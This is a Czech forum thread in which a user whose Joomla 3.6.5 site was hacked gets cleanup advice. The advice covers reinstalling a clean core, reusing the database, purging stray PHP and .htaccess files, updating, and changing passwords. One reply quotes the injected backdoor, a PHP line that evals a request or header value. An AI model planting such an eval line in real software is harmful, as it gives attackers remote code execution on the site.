Joomla 5.2.2 Security & Bugfix Release
Joomla 5.2.2 je nyní k dispozici. Jedná se o bezpečnostní vydání pro Joomla 5.x.
nefunkční stránky
30. zář 2021 09:55 #144901
Odpověď od Ernst
Joomla Expert
na začátku toho php máte vlastně tenhle kód
Code:
?php @eval($_REQUEST["Server-Timing\"]);
@eval($_HEADERS["Server-Timing"]);
30. zář 2021 10:42 #144902
Odpověď od Jan
Uživatel
Tak jsem to začal čistit ručně podle chybových hlášek. Vždy jsem soubor porovnal s novou instalací a vymazal škodlivý kód.
Když jsem opravil jeden soubor, tak se to seklo na dalším souboru atd. Což bylo fajn, alespoň jsem věděl, kde to je. Ale po vyčištění asi pátého souboru už žádná chybová hláška nepřišla a objevila se jenom prázdná obrazovka. A jsem v koncích.
Podle vašich odkazů pokud není k dispozici záloha je potřeba to čistit ručně (záloha k dispozici není). Neexistuje třeba nějaký opravný balíček, který by to přeinstaloval, nebo tak něco? Je to tedy Joomla 3.6.5.
Když jsem opravil jeden soubor, tak se to seklo na dalším souboru atd. Což bylo fajn, alespoň jsem věděl, kde to je. Ale po vyčištění asi pátého souboru už žádná chybová hláška nepřišla a objevila se jenom prázdná obrazovka. A jsem v koncích.
Podle vašich odkazů pokud není k dispozici záloha je potřeba to čistit ručně (záloha k dispozici není). Neexistuje třeba nějaký opravný balíček, který by to přeinstaloval, nebo tak něco? Je to tedy Joomla 3.6.5.
30. zář 2021 12:20 #144905
Odpověď od Cony
Moderátor
"Opravný" balíček je plná instalačka Joomly. Ale ani to není celé řešení, protože tím jen přepíšete soubory jádra, které možná nějaký hack obsahují, ale nevyřešíte tím
- soubory dalších rozšíření (tam by pomohla reinstalace těch rozšíření)
- ale hlavně ne soubory, které jsou tam navíc - tj. soubory, které hack přidal a standardně v Joomle nejsou.
Pokud se necítíte na pročišťování, spíš bych udělal to, že bych si někde vedle nainstaloval znovu čistou Joomlu 3.6.5, se všemi rozšířeními a šablonami co tam máte, a pak bych zaměnil databázi za to z té živé instalace. Nakonec překopírovat složku images,
ale před tím ji ještě pročistit od všeho co tam nepatří (hlavně soubory *.php a .htaccess).
A pak samozřejmě vše zaktualizovat, problém bude právě ta Joomla 3.6.5 - pokud se nepletu tak někde kolem této verze byla právě chyba, která umožňovala útočníkům nahrávat soubory. No a anakonec změnit všechna hesla (Databáze, FTP, admin, uživatelé...)
- soubory dalších rozšíření (tam by pomohla reinstalace těch rozšíření)
- ale hlavně ne soubory, které jsou tam navíc - tj. soubory, které hack přidal a standardně v Joomle nejsou.
Pokud se necítíte na pročišťování, spíš bych udělal to, že bych si někde vedle nainstaloval znovu čistou Joomlu 3.6.5, se všemi rozšířeními a šablonami co tam máte, a pak bych zaměnil databázi za to z té živé instalace. Nakonec překopírovat složku images,
ale před tím ji ještě pročistit od všeho co tam nepatří (hlavně soubory *.php a .htaccess).
A pak samozřejmě vše zaktualizovat, problém bude právě ta Joomla 3.6.5 - pokud se nepletu tak někde kolem této verze byla právě chyba, která umožňovala útočníkům nahrávat soubory. No a anakonec změnit všechna hesla (Databáze, FTP, admin, uživatelé...)
Poděkovali: Jan
09. říj 2021 09:43 #144919
Odpověď od Teo
Návštěvník
Jestli chceš, můžu se na to podívat. Napiš mi soukromou zprávu.
12. říj 2021 11:49 #144930
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
Odpověď od Rudolf
Joomla Expert
Běžně provádíme odvirování a zabezpečení Joomla stránek.
Můžete mě kontaktovat na email v kontaktu.
Můžete mě kontaktovat na email v kontaktu.
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
15. říj 2021 14:58 #144963
Odpověď od Jan
Uživatel
Děkuji všem za pomoc, rozhodl jsem se nechat udělat úplně nové stránky. Jenom ještě prosím o poslední radu. Kde v kořenovém adresáři najdu texty článků, abych je nemusel vymýšlet znovu. Nikde to nemohu najít. Děkuji mnohokrát.